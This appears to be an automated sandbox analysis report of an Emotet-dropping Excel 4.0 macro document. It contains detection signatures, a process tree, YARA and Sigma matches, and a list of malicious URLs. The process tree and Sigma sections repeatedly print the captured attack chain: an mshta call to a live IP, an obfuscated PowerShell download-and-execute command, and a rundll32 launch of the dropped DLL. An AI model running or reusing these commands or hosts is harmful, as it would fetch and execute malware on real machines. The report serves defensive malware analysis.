Edit tour

Windows Analysis Report
imedpub_8.xls

Overview

General Information

Sample Name:	imedpub_8.xls
Analysis ID:	562400
MD5:	e5e714cb6407688c4d57a5ac96c09047
SHA1:	8f46f78706d2530efb3e8b2fb843bf7baef60cab
SHA256:	a62bbd0c4dd80047a998ef3fe2670658ee890ffed8ad7775539967b665e2d001
Tags:	SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Sigma detected: Windows Shell File Write to Suspicious Folder

Sigma detected: Suspicious MSHTA Process Patterns

Document contains OLE streams with names of living off the land binaries

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Sigma detected: Mshta Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

PE file contains an invalid checksum

Searches for the Microsoft Outlook file path

Drops PE files

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2092 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cmd.exe (PID: 2968 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mshta.exe (PID: 2804 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 1256 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
imedpub_8.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x12ca2:$s1: Excel 0x13d08:$s1: Excel 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
imedpub_8.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\imedpub_8.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x12ca2:$s1: Excel 0x13d08:$s1: Excel 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\imedpub_8.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
C:\ProgramData\JooSee.dll	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Overview

System Summary

Sigma detected: Windows Shell File Write to Suspicious Folder

Source: File created

Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Local

Sigma detected: Suspicious MSHTA Process Patterns

Source: Process started

Author: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2968, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2804

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2092, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2968

Sigma detected: Suspicious PowerShell Command Line

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Sigma detected: MSHTA Spawning Windows Shell

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Sigma detected: Mshta Spawning Windows Shell

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Antivirus detection for URL or domain

Source: http://maxtdeveloper.com/okw9yx/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\ProgramData\JooSee.dll

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

DNS query: name: hostfeeling.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80

Source: Joe Sandbox View

ASN Name: GLOBALLAYERNL GLOBALLAYERNL

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
